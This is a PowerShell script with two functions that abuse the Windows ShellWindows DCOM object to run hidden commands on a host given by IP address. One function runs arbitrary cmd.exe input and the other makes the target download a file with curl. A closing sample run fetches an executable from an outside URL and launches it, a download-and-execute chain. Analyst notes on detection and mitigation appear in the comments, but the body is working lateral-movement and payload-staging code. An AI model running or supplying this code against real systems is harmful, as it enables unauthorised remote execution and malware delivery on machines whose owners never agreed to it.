<#
.SYNOPSIS
    Starts a command through the ShellWindows COM object on the host given by $ip.
.DESCRIPTION
    Resolves CLSID 9BA05972-F6A8-11CF-A442-00A0C90A8F39 (ShellWindows) against
    $ip, activates it, and calls Document.Application.ShellExecute so that
    "cmd.exe /c <cmd>" runs with c:\windows\system32 as working directory and
    show-state 0 (hidden window). This matches MITRE ATT&CK T1021.003
    (Remote Services: Distributed Component Object Model).

    Analyst notes: ShellWindows is hosted by explorer.exe, so the started
    process typically shows explorer.exe as its parent in process-creation
    telemetry (Sysmon Event ID 1 / Security 4688). Against a remote $ip the
    activation arrives as inbound RPC/DCOM traffic. Restricting remote DCOM
    launch/activation permissions and host-firewalling RPC limit this path.
.PARAMETER ip
    Host on which the COM object is activated. Defaults to 127.0.0.1.
.PARAMETER cmd
    Text appended after "/c " and handed to cmd.exe without quoting.
.OUTPUTS
    Whatever ShellExecute returns, passed back unchanged.
#>
function ExecDCOM($ip = "127.0.0.1", $cmd = "notepad.exe") {
    # Bind the ShellWindows CLSID to the named host, then activate it there.
    $shellWindowsType = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39', $ip)
    $windows = [System.Activator]::CreateInstance($shellWindowsType)

    # item() yields a shell window; its Document.Application exposes ShellExecute.
    $window = $windows.item()
    $shell = $window.Document.Application

    # Last argument 0 = hidden window; operation is left as $null.
    $arguments = "/c " + $cmd
    $result = $shell.ShellExecute("cmd.exe", $arguments, "c:\windows\system32", $null, 0)
    return $result
}

<#
.SYNOPSIS
    Has the host given by $ip fetch $url with curl into $dir, via ShellWindows.
.DESCRIPTION
    Same COM activation as ExecDCOM, but ShellExecute launches "curl -O <url>"
    with $dir as working directory and a hidden window, so the file is written
    to $dir under its remote name. The default $dir is $env:temp, which is
    expanded in the calling session before the call is made.

    Analyst notes: look for curl started with explorer.exe as parent and an
    outbound HTTP request from the target shortly after inbound RPC/DCOM
    activity, followed by a new executable in a temp directory.
.PARAMETER ip
    Host on which the COM object is activated. Defaults to 127.0.0.1.
.PARAMETER url
    Text appended after "-O " and handed to curl without quoting.
.PARAMETER dir
    Working directory passed to ShellExecute.
.OUTPUTS
    Whatever ShellExecute returns, passed back unchanged.
#>
function DownloadDCOM($ip = "127.0.0.1", $url = "notepad.exe", $dir = $env:temp) {
    $shellWindowsType = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39', $ip)
    $windows = [System.Activator]::CreateInstance($shellWindowsType)

    $window = $windows.item()
    $shell = $window.Document.Application

    # -O makes curl save the download in the working directory ($dir).
    $arguments = "-O " + $url
    $result = $shell.ShellExecute("curl", $arguments, $dir, $null, 0)
    return $result
}

# Sample run against the local host: download, then start the downloaded file.
# The URL host and the file name spyxx.exe are the page's own values and can be
# used as network/file indicators when hunting for this script.
DownloadDCOM "127.0.0.1" "http://sqlxss.com/spyxx.exe"
ExecDCOM "127.0.0.1" ($env:temp + "/spyxx.exe")